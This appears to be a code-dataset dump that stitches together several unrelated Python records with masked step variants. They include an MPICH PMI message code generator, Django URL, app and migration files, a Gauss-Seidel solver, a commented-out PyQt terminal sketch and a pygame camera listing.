else:\n raise Exception('unexpected kind ' + kind)\n\n\ndef attrs_identical(attrs_a, attrs_b):\n if len(attrs_a) != len(attrs_b):\n return False\n for i in range(len(attrs_a)):\n a = 
attrs_a[i]\n b = attrs_b[i]\n if a[0] != b[0] or a[1] != b[1] or a[2] != b[2]:\n return False\n return True\n\n\ndef dump_copyright(out):\n print('/*', file=out)\n print(' * Copyright (C) by Argonne National Laboratory', file=out)\n print(' * See COPYRIGHT in top-level directory', file=out)\n print(' */', file=out)\n print('', file=out)\n print('/* ** This file is auto-generated, do not edit ** */', file=out)\n print('', file=out)\n\n\ndef get_include_guard(h_file):\n h_file = re.sub('.*\\\\/', '', h_file)\n h_file = re.sub('\\\\.', '_', h_file)\n return h_file.upper() + '_INCLUDED'\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "##\n## Copyright (C) by Argonne National Laboratory\n## See COPYRIGHT in top-level directory\n##\n\nimport re\nimport os\n\nclass G:\n pmi_vers = []\n cmd_list = []\n cmd_hash = {}\n\nclass RE:\n m = None\n def match(pat, str, flags=0):\n RE.m = re.match(pat, str, flags)\n return RE.m\n def search(pat, str, flags=0):\n RE.m = re.search(pat, str, flags)\n return RE.m\n\ndef main():\n # run from pmi top_srcdir\n load_pmi_txt(\"maint/pmi-1.1.txt\", \"1.1\")\n load_pmi_txt(\"maint/pmi-2.0.txt\", \"2.0\")\n\n dump_all()\n\ndef load_pmi_txt(pmi_txt, ver):\n cur_hash = {\"version\": ver}\n G.pmi_vers.append(cur_hash)\n\n prev_cmd = None\n cur_cmd = None\n cur_attrs = None\n with open(pmi_txt, \"r\") as In:\n for line in In:\n if RE.match(r'([A-Z]+):', line):\n name = RE.m.group(1)\n cur_cmd = {\"version\": ver} # query-name, query-attrs, response-name, response-attrs\n cur_hash[name] = cur_cmd \n if name not in G.cmd_hash:\n G.cmd_list.append(name)\n G.cmd_hash[name] = cur_cmd\n prev_cmd = None\n else:\n prev_cmd = G.cmd_hash[name]\n elif RE.match(r'\\s+([QR]):\\s*([\\w-]+)(.*)', line):\n QR, cmd, tail = RE.m.group(1, 2, 3)\n cur_attrs = []\n if QR == \"Q\":\n cur_cmd[\"query-name\"] = cmd\n if RE.match(r'.*wire=.+', tail):\n # spawn - we'll manually code it\n cur_cmd[\"query-attrs\"] = []\n else:\n cur_cmd[\"query-attrs\"] = cur_attrs\n else:\n cur_cmd[\"response-name\"] = cmd\n cur_cmd[\"response-attrs\"] = cur_attrs\n elif RE.match(r'\\s+([\\w-]+):\\s*([A-Z]+)(.*)', line):\n name, kind, tail = RE.m.group(1, 2, 3)\n cur_attrs.append([name, kind, tail])\n elif RE.match(r'\\s+([\\[\\]])', line):\n cur_attrs.append(RE.m.group(1))\n\ndef dump_all():\n def dump_enums(Out):\n print(\"enum PMIU_CMD_ID {\", file=Out)\n print(\" PMIU_CMD_INVALID,\", file=Out)\n for NAME in G.cmd_list:\n print(\" PMIU_CMD_%s,\" % NAME, file=Out)\n print(\"};\", file=Out)\n print(\"\", file=Out)\n \n def dump_decls(Out):\n std_query=\"struct PMIU_cmd *pmi_query, int version, bool 
is_static\"\n std_response=\"struct PMIU_cmd *pmi_query, struct PMIU_cmd *pmi_resp, bool is_static\"\n std_get=\"struct PMIU_cmd *pmi\"\n for NAME in G.cmd_list:\n name = NAME.lower()\n v_list = []\n for v in G.pmi_vers:\n if NAME in v:\n v_list.append(v[NAME])\n v0 = v_list[0]\n decls = []\n if \"query-name\" in v0:\n if len(v0[\"query-attrs\"]):\n params = get_set_params(v0[\"query-attrs\"])\n decls.append(\"void PMIU_msg_set_query_%s(%s, %s);\" % (name, std_query, params))\n params = get_get_params(v0[\"query-attrs\"])\n decls.append(\"int PMIU_msg_get_query_%s(%s, %s);\" % (name, std_get, params))\n if \"response-name\" in v0:\n if len(v0[\"response-attrs\"]):\n params = get_set_params(v0[\"response-attrs\"])\n decls.append(\"int PMIU_msg_set_response_%s(%s, %s);\" % (name, std_response, params))\n params = get_get_params(v0[\"response-attrs\"])\n decls.append(\"int PMIU_msg_get_response_%s(%s, %s);\" % (name, std_get, params))\n if len(decls):\n print(\"/* PMIU_CMD_%s */\" % NAME, file=Out)\n for l in decls:\n print(l, file=Out)\n\n def dump_cmd_to_id(Out):\n print(\"int PMIU_msg_cmd_to_id(const char *cmd)\", file=Out)\n print(\"{\", file=Out)\n t_if = \" if\"\n for NAME in G.cmd_list:\n cmp_list = []\n prev = {}\n for v in G.pmi_vers:\n if NAME in v and \"query-name\" in v[NAME]:\n t = v[NAME][\"query-name\"]\n if t not in prev:\n cmp_list.append(\"strcmp(cmd, \\\"%s\\\") == 0\" % t)\n prev[t] = 1\n if len(cmp_list):\n print(t_if + \" (\" + ' || '.join(cmp_list) + \") {\", file=Out)\n print(\" return PMIU_CMD_%s;\" % NAME, file=Out)\n t_if = \" } else if\"\n print(\" } else {\", file=Out)\n print(\" return PMIU_CMD_INVALID;\", file=Out)\n print(\" }\", file=Out)\n print(\"}\", file=Out)\n\n def dump_id_to_str(Out, query):\n namekey = query + \"-name\"\n print(\"const char *PMIU_msg_id_to_%s(int version, int cmd_id)\" % query, file=Out)\n print(\"{\", file=Out)\n print(\" switch(cmd_id) {\", file=Out)\n for NAME in G.cmd_list:\n cmp_list = []\n prev = {}\n for 
v in G.pmi_vers:\n if NAME in v and namekey in v[NAME]:\n t = v[NAME][namekey]\n if t not in prev:\n cmp_list.append(t)\n prev[t] = 1\n if len(cmp_list) > 0:\n print(\" case PMIU_CMD_%s:\" % NAME, file=Out)\n if len(cmp_list) == 1:\n print(\" return \\\"%s\\\";\" % cmp_list[0], file=Out)\n else:\n print(\" return (version == PMIU_WIRE_V1) ? \\\"%s\\\" : \\\"%s\\\";\" % (cmp_list[0], cmp_list[1]), file=Out)\n\n print(\" default:\", file=Out)\n print(\" return NULL;\", file=Out)\n print(\" }\", file=Out)\n print(\"}\", file=Out)\n\n def dump_id_to_response(Out):\n print(\"const char *PMIU_msg_id_to_response(int version, int cmd_id)\", file=Out)\n print(\"{\", file=Out)\n print(\" switch(cmd_id) {\", file=Out)\n print(\" default:\", file=Out)\n print(\" return NULL;\", file=Out)\n print(\" }\", file=Out)\n print(\"}\", file=Out)\n\n def dump_funcs(Out):\n std_query=\"struct PMIU_cmd *pmi_query, int version, bool is_static\"\n std_response=\"struct PMIU_cmd *pmi_query, struct PMIU_cmd *pmi_resp, bool is_static\"\n std_get=\"struct PMIU_cmd *pmi\"\n\n def dump_if_version(t_if, version, is_set, is_query):\n if re.match(r\"1\\.\", version):\n ver = \"PMIU_WIRE_V1\"\n else:\n ver = \"PMIU_WIRE_V2\"\n if is_set:\n if is_query:\n print(t_if + \" (version == %s) {\" % ver, file=Out)\n else:\n print(t_if + \" (pmi_query->version == %s) {\" % ver, file=Out)\n else:\n print(t_if + \" (pmi->version == %s) {\" % ver, file=Out)\n\n def dump_attrs(spaces, is_set, is_query, attrs, attrs0):\n non_optional = 0\n for i in range(len(attrs)):\n a = attrs[i]\n var = get_var(attrs0[i][0])\n if is_query:\n pmi = \"pmi_query\"\n else:\n pmi = \"pmi_resp\"\n\n if a[1] == \"INTEGER\":\n kind = \"int\"\n elif a[1] == \"STRING\":\n kind = \"str\"\n elif a[1] == \"BOOLEAN\":\n kind = \"bool\"\n else:\n raise Exception(\"Unhandled kind: \" + a[1])\n\n if is_set:\n pmiu = \"PMIU_cmd_add_\" + kind\n print(spaces + \"%s(%s, \\\"%s\\\", %s);\" % (pmiu, pmi, a[0], var), file=Out)\n else:\n if 
RE.match(r'.*optional=(\\S+)', a[2]):\n dflt = RE.m.group(1)\n pmiu = \"PMIU_CMD_GET_%sVAL_WITH_DEFAULT\" % kind.upper()\n print(spaces + \"%s(pmi, \\\"%s\\\", *%s, %s);\" % (pmiu, a[0], var, dflt), file=Out)\n else:\n pmiu = \"PMIU_CMD_GET_%sVAL\" % kind.upper()\n print(spaces + \"%s(pmi, \\\"%s\\\", *%s);\" % (pmiu, a[0], var), file=Out)\n non_optional += 1\n return non_optional\n\n def dump_it(NAME, v_list, is_set, is_query, attrs):\n print(\"\", file=Out)\n ret_errno = True\n if is_set:\n params = get_set_params(attrs)\n if is_query:\n ret_errno = False\n print(\"void PMIU_msg_set_query_%s(%s, %s)\" % (name, std_query, params), file=Out)\n else:\n print(\"int PMIU_msg_set_response_%s(%s, %s)\" % (name, std_response, params), file=Out)\n else:\n params = get_get_params(attrs)\n if is_query:\n print(\"int PMIU_msg_get_query_%s(%s, %s)\" % (name, std_get, params), file=Out)\n else:\n print(\"int PMIU_msg_get_response_%s(%s, %s)\" % (name, std_get, params), file=Out)\n print(\"{\", file=Out)\n if ret_errno:\n print(\" int pmi_errno = PMIU_SUCCESS;\", file=Out)\n print(\"\", file=Out)\n\n if is_set:\n if is_query:\n print(\" PMIU_msg_set_query(pmi_query, version, PMIU_CMD_%s, is_static);\" % NAME, file=Out)\n else:\n print(\" PMIU_Assert(pmi_query->cmd_id == PMIU_CMD_%s);\" % NAME, file=Out)\n print(\" pmi_errno = PMIU_msg_set_response(pmi_query, pmi_resp, is_static);\", file=Out)\n attrs_b = None\n if len(v_list) > 1:\n if is_query:\n attrs_b = v_list[1][\"query-attrs\"]\n else:\n attrs_b = v_list[1][\"response-attrs\"]\n\n non_optional = 0\n if attrs_b is None or attrs_identical(attrs, attrs_b):\n non_optional += dump_attrs(\" \", is_set, is_query, attrs, attrs)\n else:\n dump_if_version(\" if\", v_list[0][\"version\"], is_set, is_query)\n non_optional += dump_attrs(\" \", is_set, is_query, attrs, attrs)\n dump_if_version(\" } else if\", v_list[1][\"version\"], is_set, is_query)\n non_optional += dump_attrs(\" \", is_set, is_query, attrs_b, attrs)\n if 
ret_errno:\n print(\" } else {\", file=Out)\n print(\" PMIU_ERR_SETANDJUMP(pmi_errno, PMIU_FAIL, \\\"invalid version\\\");\", file=Out)\n non_optional += 1\n print(\" }\", file=Out)\n\n if non_optional > 0:\n print(\"\", file=Out)\n print(\" fn_exit:\", file=Out)\n print(\" return pmi_errno;\", file=Out)\n print(\" fn_fail:\", file=Out)\n print(\" goto fn_exit;\", file=Out)\n elif ret_errno:\n print(\"\", file=Out)\n print(\" return pmi_errno;\", file=Out)\n print(\"}\", file=Out)\n\n\n for NAME in G.cmd_list:\n name = NAME.lower()\n v_list = []\n for v in G.pmi_vers:\n if NAME in v:\n v_list.append(v[NAME])\n v0 = v_list[0]\n if \"query-name\" in v0:\n if len(v0[\"query-attrs\"]):\n dump_it(NAME, v_list, True, True, v0[\"query-attrs\"])\n dump_it(NAME, v_list, False, True, v0[\"query-attrs\"])\n if \"response-name\" in v0:\n if len(v0[\"response-attrs\"]):\n dump_it(NAME, v_list, True, False, v0[\"response-attrs\"])\n dump_it(NAME, v_list, False, False, v0[\"response-attrs\"])\n\n # ----------------------\n msg_h = \"src/pmi_msg.h\"\n msg_c = \"src/pmi_msg.c\"\n with open(msg_h, \"w\") as Out:\n dump_copyright(Out)\n INC = get_include_guard(msg_h)\n print(\"#ifndef %s\" % INC, file=Out)\n print(\"#define %s\" % INC, file=Out)\n print(\"\", file=Out)\n dump_enums(Out)\n print(\"\", file=Out)\n dump_decls(Out)\n print(\"\", file=Out)\n print(\"#endif /* %s */\" % INC, file=Out)\n with open(msg_c, \"w\") as Out:\n dump_copyright(Out)\n for inc in [\"pmi_config\", \"mpl\", \"pmi_util\", \"pmi_common\", \"pmi_wire\", \"pmi_msg\"]:\n print(\"#include \\\"%s.h\\\"\\n\" % inc, file=Out)\n dump_cmd_to_id(Out)\n print(\"\", file=Out)\n dump_id_to_str(Out, \"query\")\n print(\"\", file=Out)\n dump_id_to_str(Out, \"response\")\n print(\"\", file=Out)\n dump_funcs(Out)\n\n#---- utils ------------------------------------ \ndef get_set_params(attrs):\n tlist = []\n for a in attrs:\n if len(a) == 3:\n # name, kind, tail\n tlist.append(get_kind(a[1]) + get_var(a[0]))\n return ', 
'.join(tlist)\n\ndef get_get_params(attrs):\n tlist = []\n for a in attrs:\n if len(a) == 3:\n # name, kind, tail\n tlist.append(get_kind(a[1]) + '*' + get_var(a[0]))\n return ', '.join(tlist)\n\ndef get_var(name):\n return name.replace(\"-\", \"_\")\n\ndef get_kind(kind):\n if kind == \"INTEGER\":\n return \"int \"\n elif kind == \"STRING\":\n return \"const char *\"\n elif kind == \"BOOLEAN\":\n return \"bool \"\n else:\n raise Exception(\"unexpected kind \" + kind)\n\ndef attrs_identical(attrs_a, attrs_b):\n if len(attrs_a) != len(attrs_b):\n return False\n for i in range(len(attrs_a)):\n a = attrs_a[i]\n b = attrs_b[i]\n if a[0] != b[0] or a[1] != b[1] or a[2] != b[2]:\n return False\n return True\n\n# ---- dump utils -----------------------------------------\ndef dump_copyright(out):\n print(\"/*\", file=out)\n print(\" * Copyright (C) by Argonne National Laboratory\", file=out)\n print(\" * See COPYRIGHT in top-level directory\", file=out)\n print(\" */\", file=out)\n print(\"\", file=out)\n print(\"/* ** This file is auto-generated, do not edit ** */\", file=out)\n print(\"\", file=out)\n\ndef get_include_guard(h_file):\n h_file = re.sub(r'.*\\/', '', h_file)\n h_file = re.sub(r'\\.', '_', h_file)\n return h_file.upper() + \"_INCLUDED\"\n\n# ---------------------------------------------------------\nif __name__ == \"__main__\":\n main()\n",
"step-ids": [
10,
13,
15,
18,
19
]
}
|
[
10,
13,
15,
18,
19
] |
from django.urls import path
from .views import PostListView, PostDetailView
urlpatterns = [
path('blog/', PostListView.as_view()),
path('blog/<pk>/', PostDetailView.as_view()),
]
|
normal
|
{
"blob_id": "be7fb94c3c423b67aa917a34328acda5926cf78a",
"index": 3133,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nurlpatterns = [path('blog/', PostListView.as_view()), path('blog/<pk>/',\n PostDetailView.as_view())]\n",
"step-3": "from django.urls import path\nfrom .views import PostListView, PostDetailView\nurlpatterns = [path('blog/', PostListView.as_view()), path('blog/<pk>/',\n PostDetailView.as_view())]\n",
"step-4": "from django.urls import path\nfrom .views import PostListView, PostDetailView\n\nurlpatterns = [\n path('blog/', PostListView.as_view()),\n path('blog/<pk>/', PostDetailView.as_view()),\n]",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from django.apps import AppConfig
class StonewallConfig(AppConfig):
name = 'stonewall'
|
normal
|
{
"blob_id": "8364264851895ccabeb74fd3fab1d4f39da717f8",
"index": 8398,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass StonewallConfig(AppConfig):\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass StonewallConfig(AppConfig):\n name = 'stonewall'\n",
"step-4": "from django.apps import AppConfig\n\n\nclass StonewallConfig(AppConfig):\n name = 'stonewall'\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# -*- coding: utf-8 -*-
import numpy as np
def gauss_seidel(relax, est, stop):
"""
Método iterativo de Gauss-Seidel para o sistema linear do trabalho.
Onde relax é o fator de relaxação, est é o valor inicial, stop é o
critério de parada, n é a quantidade de linhas do sistema e k é o
número de iterações.
"""
k = 0
dif = 10000
n = len(est)
diff = np.zeros(n)
while dif > stop:
k += 1
est[0] = ((1 - relax) * est[0]) + relax * (1.50 - est[1])
for i in range(1, int(n/2)):
est[i] = ((1 - relax) * est[i]) + relax * \
((1.0 - est[i-1] - est[i+1] - est[i+25])/4)
for j in range(int(n/2), n-1):
est[j] = ((1 - relax) * est[j]) + relax * \
((2.0 - est[j-25] - est[j-1] - est[j+1])/5)
est[n-1] = ((1 - relax) * est[n-1]) + relax * (3.00 - est[n-2])
dif = max(abs(np.subtract(est, diff)))
diff = np.copy(est)
return [est, k]
|
normal
|
{
"blob_id": "51540a80c7b29dc0bbb6342ee45008108d54b6f2",
"index": 714,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef gauss_seidel(relax, est, stop):\n \"\"\"\n Método iterativo de Gauss-Seidel para o sistema linear do trabalho.\n Onde relax é o fator de relaxação, est é o valor inicial, stop é o\n critério de parada, n é a quantidade de linhas do sistema e k é o\n número de iterações.\n \"\"\"\n k = 0\n dif = 10000\n n = len(est)\n diff = np.zeros(n)\n while dif > stop:\n k += 1\n est[0] = (1 - relax) * est[0] + relax * (1.5 - est[1])\n for i in range(1, int(n / 2)):\n est[i] = (1 - relax) * est[i] + relax * ((1.0 - est[i - 1] -\n est[i + 1] - est[i + 25]) / 4)\n for j in range(int(n / 2), n - 1):\n est[j] = (1 - relax) * est[j] + relax * ((2.0 - est[j - 25] -\n est[j - 1] - est[j + 1]) / 5)\n est[n - 1] = (1 - relax) * est[n - 1] + relax * (3.0 - est[n - 2])\n dif = max(abs(np.subtract(est, diff)))\n diff = np.copy(est)\n return [est, k]\n",
"step-3": "import numpy as np\n\n\ndef gauss_seidel(relax, est, stop):\n \"\"\"\n Método iterativo de Gauss-Seidel para o sistema linear do trabalho.\n Onde relax é o fator de relaxação, est é o valor inicial, stop é o\n critério de parada, n é a quantidade de linhas do sistema e k é o\n número de iterações.\n \"\"\"\n k = 0\n dif = 10000\n n = len(est)\n diff = np.zeros(n)\n while dif > stop:\n k += 1\n est[0] = (1 - relax) * est[0] + relax * (1.5 - est[1])\n for i in range(1, int(n / 2)):\n est[i] = (1 - relax) * est[i] + relax * ((1.0 - est[i - 1] -\n est[i + 1] - est[i + 25]) / 4)\n for j in range(int(n / 2), n - 1):\n est[j] = (1 - relax) * est[j] + relax * ((2.0 - est[j - 25] -\n est[j - 1] - est[j + 1]) / 5)\n est[n - 1] = (1 - relax) * est[n - 1] + relax * (3.0 - est[n - 2])\n dif = max(abs(np.subtract(est, diff)))\n diff = np.copy(est)\n return [est, k]\n",
"step-4": "# -*- coding: utf-8 -*-\nimport numpy as np\n\n\ndef gauss_seidel(relax, est, stop):\n \"\"\"\n Método iterativo de Gauss-Seidel para o sistema linear do trabalho.\n Onde relax é o fator de relaxação, est é o valor inicial, stop é o\n critério de parada, n é a quantidade de linhas do sistema e k é o\n número de iterações.\n \"\"\"\n\n k = 0\n dif = 10000\n n = len(est)\n diff = np.zeros(n)\n\n while dif > stop:\n k += 1\n\n est[0] = ((1 - relax) * est[0]) + relax * (1.50 - est[1])\n\n for i in range(1, int(n/2)):\n est[i] = ((1 - relax) * est[i]) + relax * \\\n ((1.0 - est[i-1] - est[i+1] - est[i+25])/4)\n\n for j in range(int(n/2), n-1):\n est[j] = ((1 - relax) * est[j]) + relax * \\\n ((2.0 - est[j-25] - est[j-1] - est[j+1])/5)\n\n est[n-1] = ((1 - relax) * est[n-1]) + relax * (3.00 - est[n-2])\n\n dif = max(abs(np.subtract(est, diff)))\n diff = np.copy(est)\n\n return [est, k]\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
initial = True
dependencies = []
operations = [migrations.CreateModel(name='Participant', fields=[(
'username', models.CharField(max_length=25, primary_key=True,
serialize=False)), ('phone_num', models.CharField(default='',
max_length=16)), ('password', models.CharField(max_length=16)), (
'register_datetime', models.BigIntegerField(blank=True, default=
1559382976.184129)), ('last_login_datetime', models.BigIntegerField
(blank=True, default=1559382976.184129)), ('heartbeat_smartwatch',
models.BigIntegerField(blank=True, default=1559382976.184129)), (
'heartbeat_smartphone', models.BigIntegerField(blank=True, default=
1559382976.184129))])]
<|reserved_special_token_1|>
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = []
operations = [migrations.CreateModel(name='Participant', fields=[(
'username', models.CharField(max_length=25, primary_key=True,
serialize=False)), ('phone_num', models.CharField(default='',
max_length=16)), ('password', models.CharField(max_length=16)), (
'register_datetime', models.BigIntegerField(blank=True, default=
1559382976.184129)), ('last_login_datetime', models.BigIntegerField
(blank=True, default=1559382976.184129)), ('heartbeat_smartwatch',
models.BigIntegerField(blank=True, default=1559382976.184129)), (
'heartbeat_smartphone', models.BigIntegerField(blank=True, default=
1559382976.184129))])]
<|reserved_special_token_1|>
# Generated by Django 2.2.1 on 2019-06-01 09:56
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Participant',
fields=[
('username', models.CharField(max_length=25, primary_key=True, serialize=False)),
('phone_num', models.CharField(default='', max_length=16)),
('password', models.CharField(max_length=16)),
('register_datetime', models.BigIntegerField(blank=True, default=1559382976.184129)),
('last_login_datetime', models.BigIntegerField(blank=True, default=1559382976.184129)),
('heartbeat_smartwatch', models.BigIntegerField(blank=True, default=1559382976.184129)),
('heartbeat_smartphone', models.BigIntegerField(blank=True, default=1559382976.184129)),
],
),
]
|
flexible
|
{
"blob_id": "58b12418a2a6b1ef9b63800b89e7f0b9fffd908c",
"index": 9223,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n initial = True\n dependencies = []\n operations = [migrations.CreateModel(name='Participant', fields=[(\n 'username', models.CharField(max_length=25, primary_key=True,\n serialize=False)), ('phone_num', models.CharField(default='',\n max_length=16)), ('password', models.CharField(max_length=16)), (\n 'register_datetime', models.BigIntegerField(blank=True, default=\n 1559382976.184129)), ('last_login_datetime', models.BigIntegerField\n (blank=True, default=1559382976.184129)), ('heartbeat_smartwatch',\n models.BigIntegerField(blank=True, default=1559382976.184129)), (\n 'heartbeat_smartphone', models.BigIntegerField(blank=True, default=\n 1559382976.184129))])]\n",
"step-4": "from django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n initial = True\n dependencies = []\n operations = [migrations.CreateModel(name='Participant', fields=[(\n 'username', models.CharField(max_length=25, primary_key=True,\n serialize=False)), ('phone_num', models.CharField(default='',\n max_length=16)), ('password', models.CharField(max_length=16)), (\n 'register_datetime', models.BigIntegerField(blank=True, default=\n 1559382976.184129)), ('last_login_datetime', models.BigIntegerField\n (blank=True, default=1559382976.184129)), ('heartbeat_smartwatch',\n models.BigIntegerField(blank=True, default=1559382976.184129)), (\n 'heartbeat_smartphone', models.BigIntegerField(blank=True, default=\n 1559382976.184129))])]\n",
"step-5": "# Generated by Django 2.2.1 on 2019-06-01 09:56\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Participant',\n fields=[\n ('username', models.CharField(max_length=25, primary_key=True, serialize=False)),\n ('phone_num', models.CharField(default='', max_length=16)),\n ('password', models.CharField(max_length=16)),\n ('register_datetime', models.BigIntegerField(blank=True, default=1559382976.184129)),\n ('last_login_datetime', models.BigIntegerField(blank=True, default=1559382976.184129)),\n ('heartbeat_smartwatch', models.BigIntegerField(blank=True, default=1559382976.184129)),\n ('heartbeat_smartphone', models.BigIntegerField(blank=True, default=1559382976.184129)),\n ],\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# ""
# "deb_char_cont_x9875"
# # def watch_edit_text(self): # execute when test edited
# # logging.info("TQ : " + str(len(self.te_sql_cmd.toPlainText())))
# # logging.info("TE : " + str(len(self.cmd_last_text)))
# # logging.info("LEN : " + str(self.cmd_len))
# # if len(self.te_sql_cmd.toPlainText()) < self.cmd_len or \
# # self.te_sql_cmd.toPlainText().find(self.cmd_last_text) != 0:
# # # self.te_sql_cmd.setText(self.cmd_last_text) # not writch text
# #
# # # self.te_sql_cmd.setText(self.cmd_last_text) # Work but no text highLight
# # # after press backspace
# # # self.te_sql_cmd.setDocument(self.cmd_last_text_document)
# #
# # self.te_sql_cmd.setHtml(self.cmd_last_html_text)
# #
# # logging.info("TQ : " + str(len(self.te_sql_cmd.toPlainText())))
# # logging.info("TE : " + str(len(self.cmd_last_text)))
# #
# # tempCurs = self.te_sql_cmd.textCursor()
# # # tempCurs=QTextCursor()
# # # tempCurs.movePosition(QTextCursor.Right,QTextCursor.MoveAnchor,len(self.te_sql_cmd.toPlainText()))
# #
# # tempCurs.movePosition(QTextCursor.End, QTextCursor.MoveAnchor, 0)
# # self.te_sql_cmd.setTextCursor(tempCurs)
#
#
# #
# # import subprocess
# # proc = subprocess.Popen('cmd.exe', stdin = subprocess.PIPE, stdout = subprocess.PIPE)
# #
#
# app=QApplication(sys.argv)
# window=AbtTerminal()
#
# def my_commands_ana(command):
# if command == "cd":
# # return str(os.path.dirname(os.path.realpath(__file__))) # current file Directory
# return os.getcwd()
# if "cd" in command[:2] and len(command) > 2:
# dir_name = command[3:]
# try:
# os.chdir(dir_name)
# return '<h4>dir changed to</h4> <h4 style="color:rgb(0,230,120);">%s</h4>' % os.getcwd()
# except:
# return '<h4 style="color:red">Cant change current Directory To \n\t%s</h4>' % dir_name
# if "$$" in command[:2]:
# stdout, stderr = proc.communicate(bytes(str(command[2:]), 'UTF-8'))
# deleted_length_before=len("b'Microsoft Windows [Version 10.0.10586]\r\n(c) 2015 Microsoft Corporation. All rights reserved.\r\n\r\n")
# deleted_length_after=len(">More? '")
# # real_result=str(stdout)[deleted_length_before+4:len(str(stdout))-deleted_length_after]
# real_result=str(stdout.decode("utf-8")).replace("Microsoft Windows [Version 10.0.10586]\r\n(c) 2015 Microsoft Corporation. All rights reserved.\r\n\r\n","")
# real_result=real_result.replace(">More?","")
# print(real_result)
# return real_result
#
#
#
#
#
# ###############
# import subprocess
# cmdline = ["cmd", "/q", "/k", "echo off"]
# cmd = subprocess.Popen(cmdline, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
#
#
# if "$$" in command[:2]:
# batch = b"""\
# cd
# """
#
# # cmd.stdin.write(bytes(str(command[2:]), 'UTF-8'))
#
# cmd.stdin.write(batch)
# cmd.stdin.flush() # Must include this to ensure data is passed to child process
# result = cmd.stdout.read()
# return " "
|
normal
|
{
"blob_id": "f70f4f093aa64b8cd60acbb846855ca3fed13c63",
"index": 4837,
"step-1": "# \"\"\n# \"deb_char_cont_x9875\"\n# # def watch_edit_text(self): # execute when test edited\n# # logging.info(\"TQ : \" + str(len(self.te_sql_cmd.toPlainText())))\n# # logging.info(\"TE : \" + str(len(self.cmd_last_text)))\n# # logging.info(\"LEN : \" + str(self.cmd_len))\n# # if len(self.te_sql_cmd.toPlainText()) < self.cmd_len or \\\n# # self.te_sql_cmd.toPlainText().find(self.cmd_last_text) != 0:\n# # # self.te_sql_cmd.setText(self.cmd_last_text) # not writch text\n# #\n# # # self.te_sql_cmd.setText(self.cmd_last_text) # Work but no text highLight\n# # # after press backspace\n# # # self.te_sql_cmd.setDocument(self.cmd_last_text_document)\n# #\n# # self.te_sql_cmd.setHtml(self.cmd_last_html_text)\n# #\n# # logging.info(\"TQ : \" + str(len(self.te_sql_cmd.toPlainText())))\n# # logging.info(\"TE : \" + str(len(self.cmd_last_text)))\n# #\n# # tempCurs = self.te_sql_cmd.textCursor()\n# # # tempCurs=QTextCursor()\n# # # tempCurs.movePosition(QTextCursor.Right,QTextCursor.MoveAnchor,len(self.te_sql_cmd.toPlainText()))\n# #\n# # tempCurs.movePosition(QTextCursor.End, QTextCursor.MoveAnchor, 0)\n# # self.te_sql_cmd.setTextCursor(tempCurs)\n#\n#\n# #\n# # import subprocess\n# # proc = subprocess.Popen('cmd.exe', stdin = subprocess.PIPE, stdout = subprocess.PIPE)\n# #\n#\n# app=QApplication(sys.argv)\n# window=AbtTerminal()\n#\n# def my_commands_ana(command):\n# if command == \"cd\":\n# # return str(os.path.dirname(os.path.realpath(__file__))) # current file Directory\n# return os.getcwd()\n# if \"cd\" in command[:2] and len(command) > 2:\n# dir_name = command[3:]\n# try:\n# os.chdir(dir_name)\n# return '<h4>dir changed to</h4> <h4 style=\"color:rgb(0,230,120);\">%s</h4>' % os.getcwd()\n# except:\n# return '<h4 style=\"color:red\">Cant change current Directory To \\n\\t%s</h4>' % dir_name\n# if \"$$\" in command[:2]:\n# stdout, stderr = proc.communicate(bytes(str(command[2:]), 'UTF-8'))\n# deleted_length_before=len(\"b'Microsoft Windows [Version 
10.0.10586]\\r\\n(c) 2015 Microsoft Corporation. All rights reserved.\\r\\n\\r\\n\")\n# deleted_length_after=len(\">More? '\")\n# # real_result=str(stdout)[deleted_length_before+4:len(str(stdout))-deleted_length_after]\n# real_result=str(stdout.decode(\"utf-8\")).replace(\"Microsoft Windows [Version 10.0.10586]\\r\\n(c) 2015 Microsoft Corporation. All rights reserved.\\r\\n\\r\\n\",\"\")\n# real_result=real_result.replace(\">More?\",\"\")\n# print(real_result)\n# return real_result\n#\n#\n#\n#\n#\n# ###############\n# import subprocess\n# cmdline = [\"cmd\", \"/q\", \"/k\", \"echo off\"]\n# cmd = subprocess.Popen(cmdline, stdin=subprocess.PIPE, stdout=subprocess.PIPE)\n#\n#\n# if \"$$\" in command[:2]:\n# batch = b\"\"\"\\\n# cd\n# \"\"\"\n#\n# # cmd.stdin.write(bytes(str(command[2:]), 'UTF-8'))\n#\n# cmd.stdin.write(batch)\n# cmd.stdin.flush() # Must include this to ensure data is passed to child process\n# result = cmd.stdout.read()\n# return \" \"\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
1
]
}
|
[
1
] |
import sys
import pygame
import pygame.camera
from pygame.locals import *
from PIL import Image
pygame.init()
pygame.camera.init()
camlist = pygame.camera.list_cameras()
print(camlist)
# images = map(Image.open, ['Test1.jpg', 'Test2.jpg', 'Test3.jpg'])
# widths, heights = zip(*(i.size for i in images))
# total_width = sum(widths)
